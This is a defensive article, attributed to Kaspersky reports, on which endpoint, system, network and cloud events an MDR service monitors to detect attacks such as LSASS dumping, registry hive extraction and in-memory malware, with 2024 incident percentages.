How an MDR Service Can Detect Attacks in Business Infrastructure

In an increasingly complex and threatening digital environment, traditional security solutions are no longer sufficient to detect advanced attacks. Cybercriminals employ sophisticated techniques to evade conventional firewalls and antivirus software, making Managed Detection and Response (MDR) services essential for any company looking to protect its systems from persistent threats.

For an MDR service to be truly effective, it is crucial to have well-configured data sources within the protected infrastructure. This involves the collection of real-time telemetry, monitoring of critical events, and the use of up-to-date threat intelligence. Below are the most important events that an MDR service should analyze to detect attacks before they cause significant damage.

Main Events for Detecting Cyberattacks

1. Extraction of Sensitive Data from the Windows Registry

One of the most common techniques used by attackers is the extraction of critical information from the Windows Registry (known as registry hive dumping). This type of attack was observed in 27% of high-severity incidents analyzed in 2024.

MDR services can detect this behavior thanks to telemetry from Endpoint Detection and Response (EDR) solutions installed on protected systems. They can also leverage Endpoint Protection Platform (EPP) solutions capable of identifying unusual accesses to the registry.

2. Malware Execution in Memory

Modern attacks are increasingly avoiding the storage of malware on hard drives by executing it directly in the system’s memory. This complicates detection by traditional antivirus solutions.

According to MDR data, 17% of severe attacks in 2024 involved the execution of malware in memory. The only way to identify this type of threat is through real-time memory monitoring tools integrated into EPP and EDR solutions.

3. Creation and Execution of Suspicious Services

Attackers often abuse Windows services to execute malicious code with elevated privileges. In nearly 17% of the analyzed incidents, the execution of services containing suspicious arbitrary code was detected.

To mitigate this type of attack, it is essential to configure operating system event telemetry to capture detailed information about running processes and services that start with the system.

4. Access to Malicious IP Addresses

One of the simplest but effective indicators of a possible intrusion is communication with known malicious servers. These accesses, detected in 12% of high-severity incidents, can be monitored through:

• Databases of malicious IP reputations.
• Traffic analysis on the network using firewalls and SIEM solutions.
• Monitoring of DNS and HTTP requests within the company’s infrastructure.

An effective MDR service must be linked to a constantly updated threat database to detect suspicious accesses in real time.

5. Memory Fragment Capture (LSASS Dumping)

Attackers aim to escalate privileges within the network by obtaining credentials stored in memory. A common technique is dumping the LSASS process memory (Local Security Authority Subsystem Service), which was detected in 12% of severe attacks in 2024.

To identify these attempts, an MDR service should analyze:

• Unusual behaviors in the execution of processes with elevated privileges.
• Attempts to access the LSASS process through specific rules in EPP and EDR.
• Commands executed on the system that indicate attempts to dump credentials.

6. Execution of Low-Reputation Files

A file or script may not be immediately categorized as malware, but if it has been involved in suspicious activity, its execution should be analyzed in detail. In 10% of detected attacks, the execution of files with dubious reputations was a key indicator of a potential security breach.

To mitigate this risk, the MDR service should integrate threat intelligence that enables the identification of files with suspicious histories and prevents their execution.

7. Creation of Privileged Users

Beyond credential theft, some attackers create new accounts with elevated privileges to ensure persistent access to the network. In 9% of the analyzed incidents, the addition of accounts to administrative groups within the corporate domain was detected.

Monitoring of these events should include:

• Logging of all account modifications on servers.
• Real-time alerts when an account gains elevated privileges without authorization.

8. Remote Process Execution

Attacks that allow remote execution of processes were detected in more than 5% of cases. This includes commands executed from compromised workstations to internal servers.

To prevent these incidents, it is essential to:

• Log all remotely launched processes.
• Monitor the loading of executable files into the system’s memory.

9. Malicious URLs in Event Parameters

Some threats include malicious links within system event parameters, such as command lines executed by suspicious processes. This type of behavior was observed in nearly 5% of detected attacks.

To mitigate these attacks, an MDR service must have:

• Advanced analysis of recorded events.
• Integration with databases of malicious URL reputations.

Key Telemetry Sources for an Efficient MDR

For an MDR service to be truly effective in detecting advanced attacks, it must have access to multiple telemetry sources. Among the most important are:

1. Telemetry from EPP and EDR
   • Logging of running processes and services.
   • Behavioral analysis of files in memory.
   • Monitoring of access to the Windows registry and LSASS.
2. Operating System Events
   • Detailed logs of activity in Windows (security events, processes, accesses).
   • Proper configuration of the auditing system in Linux (Audit Daemon).
   • Use of tools like Sysmon, which improves the quality of logs in Windows.
3. Network Device Logs
   • Firewalls and web filters configured to capture suspicious connection attempts.
   • DNS and HTTP traffic analysis to detect communications with malicious servers.
4. Cloud Service Logs
   • Monitoring of accesses and modifications on SaaS platforms.
   • Configuration of auditing in tools like AWS CloudTrail to log critical events.

Conclusion: The Importance of Early Detection

Cyberattacks are becoming increasingly sophisticated and can easily evade traditional defenses. A well-implemented MDR service not only acts as an advanced shield but also allows for the identification of intrusions in real time, preventing attacks from spreading within the corporate infrastructure.

Effective detection depends on a proper configuration of telemetry, proactive monitoring, and integration of up-to-date threat intelligence. Organizations that invest in MDR can drastically reduce the risk of security breaches, protecting both their data and their reputation.

Source: Kaspersky Reports